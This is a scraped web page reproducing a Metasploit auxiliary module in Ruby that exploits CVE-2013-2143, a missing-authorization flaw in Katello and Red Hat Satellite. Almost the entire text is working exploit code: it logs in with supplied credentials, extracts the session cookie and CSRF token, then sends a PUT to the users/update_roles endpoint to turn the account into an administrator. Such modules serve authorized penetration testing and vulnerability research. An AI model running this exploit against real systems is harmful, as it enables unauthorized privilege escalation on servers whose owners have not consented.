Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize9super(10'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization',11'Description' => %q{12This module exploits a missing authorization vulnerability in the13"update_roles" action of "users" controller of Katello and Red Hat Satellite14(Katello 1.5.0-14 and earlier) by changing the specified account to an15administrator account.16},17'Author' => 'Ramon de C Valle',18'License' => MSF_LICENSE,19'References' => [20['CVE', '2013-2143'],21['CWE', '862'],22['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=970849']23],24'DisclosureDate' => 'Mar 24 2014'25)2627register_options(28[29Opt::RPORT(443),30OptBool.new('SSL', [true, 'Use SSL', true]),31OptString.new('USERNAME', [true, 'Your username']),32OptString.new('PASSWORD', [true, 'Your password']),33OptString.new('TARGETURI', [ true, 'The path to the application', '/']),34], self.class35)36end3738def run39print_status("Logging into #{target_url}...")40res = send_request_cgi(41'method' => 'GET',42'uri' => normalize_uri(target_uri.path, 'user_session', 'new'),43'vars_get' => {44'username' => datastore['USERNAME'],45'password' => datastore['PASSWORD']46}47)4849if res.nil?50print_error('No response from remote host')51return52end5354if res.headers['Location'] =~ %r{user_session/new$}55print_error('Authentication failed')56return57else58session = ::Regexp.last_match(1) if res.get_cookies =~ /_katello_session=(\S*);/5960if session.nil?61print_error('Failed to retrieve the current session')62return63end64end6566print_status('Retrieving the CSRF token for this session...')67res = send_request_cgi(68'cookie' => "_katello_session=#{session}",69'method' => 'GET',70'uri' => normalize_uri(target_uri.path, 'dashboard')71)7273if res.nil?74print_error('No response from remote host')75return76end7778if res.headers['Location'] =~ %r{user_session/new$}79print_error('Authentication failed')80return81else82session = ::Regexp.last_match(1) if res.get_cookies =~ /_katello_session=(\S*);/8384if session.nil?85print_error('Failed to retrieve the current session')86return87end88end8990if res.headers['Location'] =~ %r{user_session/new$}91print_error('Failed to retrieve the user id')92return93else94csrf_token = ::Regexp.last_match(1) if res.body =~ %r{<meta +content="(\S*)" +name="csrf-token" */?>}i95if csrf_token.nil? && (res.body =~ %r{<meta +name="csrf-token" +content="(\S*)" */?>}i)96csrf_token = ::Regexp.last_match(1)97end9899if csrf_token.nil?100print_error('Failed to retrieve the CSRF token')101return102end103104user = ::Regexp.last_match(1) if res.body =~ %r{/users.(\d+)#list_search=#{datastore['USERNAME']}}105106if user.nil?107print_error('Failed to retrieve the user id')108return109end110end111112print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...")113res = send_request_cgi(114'cookie' => "_katello_session=#{session}",115'headers' => {116'X-CSRF-Token' => csrf_token117},118'method' => 'PUT',119'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'),120'vars_post' => {121'user[role_ids][]' => '1'122}123)124125if res.nil?126print_error('No response from remote host')127return128end129130if res.headers['X-Message-Type'] =~ /success$/131print_good('User updated successfully')132else133print_error('Failed to update user')134end135end136137def target_url(*args)138(ssl ? 'https' : 'http') +139if rport.to_i == 80 || rport.to_i == 443140"://#{vhost}"141else142"://#{vhost}:#{rport}"143end + normalize_uri(target_uri.path, *args)144end145end146147148